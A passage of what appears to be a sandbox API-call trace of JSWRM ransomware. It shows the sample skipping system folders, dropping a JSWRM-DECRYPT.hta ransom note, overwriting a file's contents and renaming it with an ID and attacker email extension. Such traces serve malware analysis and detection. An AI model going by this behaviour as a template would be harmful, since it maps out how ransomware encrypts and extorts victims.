ftLastWriteTime.dwLowDateTime=0xf18f9628, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e68, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.873] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0126.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0126.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.873] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0126.873] lstrcmpiW (lpString1="pt-PT", lpString2=".") returned 1 [0126.873] lstrcmpiW (lpString1="pt-PT", lpString2="..") returned 1 [0126.873] lstrcmpiW (lpString1="pt-PT", lpString2="...") returned 1 [0126.873] lstrcmpiW (lpString1="pt-PT", lpString2="windows") returned -1 [0126.873] lstrcmpiW (lpString1="pt-PT", lpString2="recovery") returned -1 [0126.873] lstrcmpiW (lpString1="pt-PT", lpString2="perflogs") returned 1 [0126.873] lstrcmpiW (lpString1="pt-PT", lpString2="documents and settings") returned 1 [0126.873] lstrcmpiW (lpString1="pt-PT", lpString2="$RECYCLE.BIN") returned 1 [0126.876] lstrcmpiW (lpString1="pt-PT", lpString2="system volume information") returned -1 [0126.876] lstrcmpiW (lpString1="pt-PT", lpString2="msocache") returned 1 [0126.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0126.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0126.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0126.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0126.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0126.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0126.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt-pt\\jswrm-decrypt.hta")) returned 0xffffffff [0126.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0126.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0126.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0126.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0126.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0126.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0126.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt-pt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.878] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.878] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.879] CloseHandle (hObject=0x314) returned 1 [0126.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0126.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0126.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0126.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0126.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0126.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0126.880] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt-PT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt-pt\\jswrm-decrypt.hta")) returned 0x20 [0126.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0126.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0126.880] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt-PT\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4249c59a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0126.880] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.880] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4249c59a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0126.880] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.880] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.880] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4249c59a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4249c59a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4249c59a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.880] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0126.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0126.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0126.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0126.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0126.881] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167cf4d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x110e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.881] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0126.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x240fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0126.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0126.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt-PT\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt-pt\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.883] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4366) returned 1 [0126.883] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1100) returned 0x279338 [0126.883] ReadFile (in: hFile=0x338, lpBuffer=0x279338, nNumberOfBytesToRead=0x1100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesRead=0x345e1cc*=0x1100, lpOverlapped=0x0) returned 1 [0126.885] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.885] WriteFile (in: hFile=0x338, lpBuffer=0x279338*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesWritten=0x345e1c8*=0x1100, lpOverlapped=0x0) returned 1 [0126.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x279338 | out: hHeap=0x1e0000) returned 1 [0126.885] CloseHandle (hObject=0x338) returned 1 [0126.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0126.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0126.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0126.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0126.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0126.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.885] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt-PT\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt-pt\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pt-PT\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pt-pt\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0126.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0126.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0126.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.886] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4733b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4733b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa531f86, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.886] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.886] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.886] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.886] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.886] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0126.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0126.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0126.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0126.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23ddc8 [0126.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0126.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.887] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5fc257f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x39088, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.887] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.887] lstrcmpiW 